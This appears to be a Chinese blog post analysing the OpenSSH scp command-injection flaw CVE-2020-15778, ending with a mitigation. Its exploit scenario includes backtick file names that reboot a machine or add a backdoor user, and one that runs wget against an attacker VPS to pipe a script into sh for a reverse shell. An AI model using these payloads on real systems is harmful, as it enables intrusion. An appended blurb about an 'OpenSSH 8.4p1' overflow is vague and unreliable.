openssh漏洞_CVE202015778 SSH漏洞复现分析

在众多的工业路由器和部分控制器内,采用了OpenSSH来做外部连接和管理。2020年7月9日被国外安全研究员ChinmayPandya发现OpenSSH 8.3 p1及之前版本中SCP命令里存在命令注入漏洞。

99981b2fbf322e6eccfabb13ecf9e033.png

上面为https://github.com/openssh/openssh-portable/blob/master/scp.c的代码,989行则是漏洞触发所在。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾。例如,如果执行以下命令:

scp SourceFileuser@host:directory/TargetFile

它将执行一个本地命令:

scp-t directory/TargetFile

在创建本地scp命令时,它没有清理文件名。攻击者可以采用反引号(`)文件作为命令注入。而linux系统是可以接受以反引号(`)为文件命名方式。如果你尝试把payload放在反引号中作为文件名,当调用scp命令时就会触发这个指令的执行。

漏洞利用场景:

攻击者可以采用U盘伪装成设备固件或者某种工具,在U盘中创建深度子目录,某一个目录中一个文件可以命名为`payload`,比如`reboot`。当受害者拷贝U盘目录及文件的时候采用scp -r \文件夹 RemoteIP:\文件夹 这条命令的时候,就会触发受害者的机器重启,同理如果你采用反引号+useradd这样的文件名,就可以直接在受害者机器上开启后门。当然变态一点的红队利用,就是在VPS上假设FTP放入反弹shell脚本,然后利用反引号(`)结合wget http:// vps:port/xxx.sh | sh ./xxx.sh 作为文件名,触发受害者反弹shell到VPS上。

对于远程命令的执行,还是需要bypass authorized_keys,所以远程被利用几率比较小。以下这段PoC视频,只是给大家演示一下,是可以存在远程执行命令的可能性,但是前提是要bypass authorized_keys否则,你还是需要知道

password的。

防护解决方案

截止到现在openssh的github并没有修补这个漏洞,禁用scp -r 整体目录拷贝方式,采用tar压缩目录为单一文件后,scp上传到远端机器后,再ssh远端机器解压目录。

参考:https://github.com/cpandya2909/CVE-2020-15778

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
近日,作者成功在Ubuntu 20.04 LTS系统上实现了OpenSSH 8.4p1漏洞复现。该漏洞是一个堆缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码或拒绝服务攻击。 在复现过程中,作者利用了Ubuntu 20.04 LTS系统中预装的OpenSSH服务器,同时安装了一个客户端用于模拟攻击。攻击流程如下: 首先,需要生成一个用于攻击的SSH私钥,该私钥长度要大于等于384bit,作者使用了一个长度为512bit的私钥。然后,我们需要在攻击机上启动一个恶意SSH服务器,在该服务器上部署恶意的公钥。接下来,使用攻击机的SSH客户端连接到目标服务器,并使用恶意私钥进行身份验证。此时,由于OpenSSH 8.4p1存在堆缓冲区溢出漏洞,攻击者可在目标服务器上执行任意代码。 在本次复现中,作者利用了一个名为“ssh-exploit”的实用程序来执行攻击。该工具可自动生成攻击代码,并自动执行攻击。通过这种方式,作者成功复现OpenSSH 8.4p1漏洞,证明了该漏洞的存在性和危害性,并为安全研究工作提供了重要的参考。 为了避免OpenSSH 8.4p1漏洞带来的安全风险,系统管理员可以采取多种措施进行防范。首先,建议管理员尽快升级OpenSSH到修复该漏洞的版本。其次,管理员可以限制SSH服务的访问权限,避免未授权的远程访问。此外,管理员还应定期检查系统安全性并修补漏洞,以保持系统的安全性和稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值